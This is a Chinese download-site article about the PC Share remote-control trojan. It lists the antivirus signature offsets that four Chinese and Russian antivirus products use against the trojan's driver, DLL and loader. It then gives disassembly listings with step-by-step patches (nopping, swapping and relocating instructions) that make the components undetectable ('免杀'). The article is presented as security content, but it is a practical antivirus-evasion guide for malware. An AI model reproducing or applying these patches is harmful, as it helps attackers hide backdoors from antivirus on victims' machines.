IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心安全防范PC Share特征码公布及修改方法

PC Share特征码公布及修改方法


2009/2/19 0:05:26 编辑:佚名 来源:本站整理 
今天给大家分享PC Share特征码公布及修改方法安全防范文章。喜欢PC Share特征码公布及修改方法的可以分享PC Share特征码公布及修改方法给你的好友。

1、定位
卡巴:
pchide.sys:
[特征] 00000986_00000001
pcmain.dll
[特征] 0000BB02_00000001
pcinit.exe
[特征] 00000825_00000001
[特征] 00001369_00000001

喜欢安全防范的网友不妨去看看下面的文章:
  • 瑞星:
    pchide.sys:
    [特征] 00000D56_00000001
    pcmain.dll:
    [特征] 0000BB49_00000001
    pcinit.exe
    [特征] 00000673_00000001
    [特征] 00000827_00000001
    [特征] 00000D5B_00000001

    金山:
    pchide.sys:
    [特征] 00000D3E_00000001
    pcmain.dll:
    反向:
    [特征] 0000BAB4_00000001
    [特征] 0000BABB_00000001
    [特征] 0000DE28_00000001
    [特征] 0000DE79_00000001
    pcinit.exe:
    [特征] 00001238_00000001
    [特征] 00001265_00000001

    江民:
    pchide.sys:
    [特征] 00000DAF_00000001
    pcmain.dll:
    [特征] 0000BB0A_00000001
    pcinit.exe:
    [特征] 000008BC_00000001
    [特征] 00000EE4_00000001
    [特征] 000012BA_00000001

    ########################################################################################################################
    2、修改特征码:
    //***********************************************************************************************************************
    卡巴:
    pchide.sys:
    [特征] 00000986_00000001
    00010975:  FF15 20030100              CALL [10320]
    0001097B:  33C0                       XOR EAX,EAX
    0001097D:  EB 11                      JMP SHORT 00010990
    0001097F:  50                         PUSH EAX
    00010980:  33C0                       XOR EAX,EAX       //nop掉
    00010982:  33C0                       XOR EAX,EAX
    00010984:  0F84 03000000              JE 0001098D
    0001098A:  55                         PUSH EBP
    0001098B:  8211 58                    ADC BYTE PTR [ECX],58
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll
    [特征] 0000BB02_00000001
    1000BAF9:  EB 4E                      JMP SHORT 1000BB49
    1000BAFB:  57                         PUSH EDI
    1000BAFC:  56                         PUSH ESI
    1000BAFD:  53                         PUSH EBX
    1000BAFE:  E8 FDF8FFFF                CALL 1000B400     //2、改1000B400为:1000B3F8
    1000BB03:  83FE 01                    CMP ESI,1

    1000B3F8                                                //1、将1000B400处代码移到此处

    1000B3FE:  90                         NOP
    1000B3FF:  90                         NOP
    1000B400:  8B4424 08                  MOV EAX,[ESP+8]
    1000B404:  81EC 24050000              SUB ESP,524
    1000B40A:  83F8 01                    CMP EAX,1
    1000B40D:  56                         PUSH ESI
    1000B40E:  57                         PUSH EDI
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe
    [特征] 00000825_00000001  00401425
    0040081D:  FFD6                       CALL NEAR ESI
    0040081F:  6A 06                      PUSH 1            //
    00400821:  58                         POP EAX
    00400822:  5F                         POP EDI
    00400823:  5E                         POP ESI
    00400824:  5B                         POP EBX
    00400825:  C9                         LEAVE
    [特征] 00001369_00000001  00401F69
    该处的call调用, 进入到call内如下, 把其中上面的四句移到空白区域, 然后修改call调用地址, 免杀!

    00401429  /$  55                    push    ebp
    0040142A  |.  8BEC                  mov     ebp, esp
    0040142C  |.  81EC 00010000         sub     esp, 100
    00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0
    00401439  |.  56                    push    esi
    0040143A  |.  57                    push    edi

    55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

    00401FDB      00                    db      00
    00401FDC      00                    db      00

    //***********************************************************************************************************************
    瑞星:
    pchide.sys:
    [特征] 00000D56_00000001
    00010D4C:  6A 3B                      PUSH 3B
    00010D4E:  59                         POP ECX
    00010D4F:  33C0                       XOR EAX,EAX          //sub eax,eax
    00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]
    00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll:(在这一段的起始位置, 有个跳转跳到1000BB49处, 将此处上一句的xor eax, eax nop掉就ok了……)
    [特征] 0000BB49_00000001              1000C749
    1000BB3A:  85C0                       TEST EAX,EAX
    1000BB3C:  74 08                      JE SHORT 1000BB46
    1000BB3E:  57                         PUSH EDI
    1000BB3F:  56                         PUSH ESI
    1000BB40:  53                         PUSH EBX
    1000BB41:  FFD0                       CALL EAX
    1000BB43:  8945 0C                    MOV [EBP+C],EAX
    1000BB46:  8B45 0C                    MOV EAX,[EBP+C]
    1000BB49:  5F                         POP EDI
    1000BB4A:  5E                         POP ESI
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe
    [特征] 00000673_00000001  00401273
    00400664:  56                         PUSH ESI
    00400665:  8B31                       MOV ESI, [DWORD DS:ECX]
    00400667:  57                         PUSH EDI
    00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]
    0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI
    00400671:  8B31                       MOV ESI, [DWORD DS:ECX]
    00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       //与上一行交换位置
    00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]
    [特征] 00000827_00000001  00401427
    0040081D:  FFD6                       CALL NEAR ESI
    0040081F:  6A 06                      PUSH 6                   //此处在修改卡巴时已经修改过了:原来为:push 1
    00400821:  58                         POP EAX
    00400822:  5F                         POP EDI
    00400823:  5E                         POP ESI
    00400824:  5B                         POP EBX
    00400825:  C9                         LEAVE
    00400826:  C2 0C00                    RETN C
    [特征] 00000D5B_00000001  0040195B
    00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]
    00400D36:  8BF8                       MOV EDI, EAX
    00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI
    00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]
    00400D41:  3D B7000000                CMP EAX, B7
    00400D46:  0F84 E1020000              JE 0040102D
    00400D4C:  68 30750000                PUSH 7530
    00400D51:  57                         PUSH EDI
    00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]
    00400D58:  85C0                       TEST EAX, EAX              //改为:and  eax,eax
    //***********************************************************************************************************************
    金山:
    pchide.sys:
    [特征] 00000D3E_00000001
    00010D2A:  73 00                      JNB     SHORT 00010D2C
    00010D2C:  5C                         POP     ESP
    00010D2D:  0000                       ADD     [EAX],AL
    00010D2F:  0055 8B                    ADD     [EBP-75],DL
    00010D32:  EC                         IN      AL,DX
    00010D33:  81EC 18020000              SUB     ESP,218
    00010D39:  56                         PUSH    ESI
    00010D3A:  57                         PUSH    EDI
    00010D3B:  BE 020D0100                MOV     ESI,10D02
    00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   //和上一行交换位置!
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll:
    反向:
    [特征] 0000BAB4_00000001
    1000BAB3:  55                         PUSH EBP
    1000BAB4:  8BEC                       MOV EBP,ESP  //与下面一行互换, 然后后面的EBP+8等都再加4
    1000BAB6:  53                         PUSH EBX
    1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]
    1000BABA:  56                         PUSH ESI
    [特征] 0000BABB_00000001           //上一个已经改了, 在一起

    [特征] 0000DE28_00000001              //这两处直接改大小写就ok了……(大写+20h=小写)
    [特征] 0000DE79_00000001
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe:
    [特征] 00001238_00000001  00401E38
    [特征] 00001265_00000001  00401E65
    00401259:  8965 E8                    MOV [EBP-18],ESP
    0040125C:  33DB                       XOR EBX,EBX
    0040125E:  895D FC                    MOV [EBP-4],EBX
    00401261:  6A 02                      PUSH 2
    00401263:  FF15 8C204000              CALL [40208C]

    //***********************************************************************************************************************
    江民:
    pchide.sys:
    [特征] 00000DAF_00000001
    00010D96:  59                         POP     ECX
    00010D97:  59                         POP     ECX
    00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]
    00010D9E:  50                         PUSH    EAX
    00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]
    00010DA2:  50                         PUSH    EAX
    00010DA3:  FF15 10030100              CALL    NEAR [10310]
    00010DA9:  68 200F0100                PUSH    10F20
    00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     //将这一行与上面一行互换
    00010DB4:  50                         PUSH    EAX
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll:
    [特征] 0000BB0A_00000001
    1000BAF7:  90                         NOP
    1000BAF8:  90                         NOP
    1000BAF9:  EB 4E                      JMP SHORT 1000BB49
    1000BAFB:  57                         PUSH EDI
    1000BAFC:  56                         PUSH ESI
    1000BAFD:  53                         PUSH EBX
    1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8
    1000BB03:  83FE 01                    CMP ESI,1
    1000BB06:  8945 0C                    MOV [EBP+C],EAX          //与上面一句互换位置!
    1000BB09:  75 0C                      JNZ SHORT 1000BB17
    1000BB0B:  85C0                       TEST EAX,EAX
    1000BB0D:  75 37                      JNZ SHORT 1000BB46
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe:
    [特征] 000008BC_00000001  004014BC

    [特征] 00000EE4_00000001  00401AE4
    00400EC3:  50                         PUSH EAX
    00400EC4:  8D86 06080000              LEA EAX,[ESI+806]
    00400ECA:  50                         PUSH EAX
    00400ECB:  FFD3                       CALL EBX
    00400ECD:  8D86 06080000              LEA EAX,[ESI+806]
    00400ED3:  68 78304000                PUSH 403078
    00400ED8:  50                         PUSH EAX
    00400ED9:  FFD3                       CALL EBX
    00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]
    00400EE1:  8D86 06090000              LEA EAX,[ESI+906]
    00400EE7:  51                         PUSH ECX
    00400EE8:  50                         PUSH EAX
    [特征] 000012BA_00000001  00401EBA         //转移
    00401EB8  |.  59                    pop     ecx
    00401EB9  |>  E8 E2000000           call    00401FA0
    00401EBE  |.  68 0C304000           push    0040300C

    00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000
    00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000
    00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp
    00401FAF  |.  59                    pop     ecx
    00401FB0  |.  59                    pop     ecx
    00401FB1  \.  C3                    retn

    68 00 00 03 00 68 00 00 01 00

    00401FF2      68 00000300           push    30000

    12下一页

    相关文章
  • 魔之符咒6.81名人堂密码魔之符咒6.81隐藏npc在哪里攻略
  • PCB简介及PCB优势概述
  • dnf时空石在哪里兑换 NPC红尾乔纳森可以兑换什么
  • 三国志13威力加强版NPC武将威名升级规律 三国志13攻略
  • DNF怪盗小姐npc在哪 怪盗小姐npc位置介绍
  • 猎天使魔女pc版使用PS4手柄方法分享
  • dnf暗黑城老林煎饼摊在哪 林大叔NPC坐标位置
  • dnf4.13更新后神秘人在哪里 黑衣人NPC送的箱子里面有什么
  • 相关推荐
  • 相册飞船(相册飞船pc客户端) v1.0.1.102 官方版
  • 解决找不到hpcjrrps.Dll问题_hpcjrrps.dll 最新版
  • 计算机锁定工具(Chris PC-Lock桌面锁定工具下载) v3.50 官方版
  • tpcps.dll注册版(修复tpcps.dll找不到) v1.0 绿色最新版
  • PC助手(电脑助手工具箱下载) v1.6.0 官方版
  • 飞豆微信PC端聊天助手(微信聊天助手) 2.0.6 最新版
  • 【小熙】单双/PC蛋蛋/加拿大/预测/可一键复制粘贴计划 v1.0 最新版
  • 迅雷PC版不限速下载 1.0
  • 发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图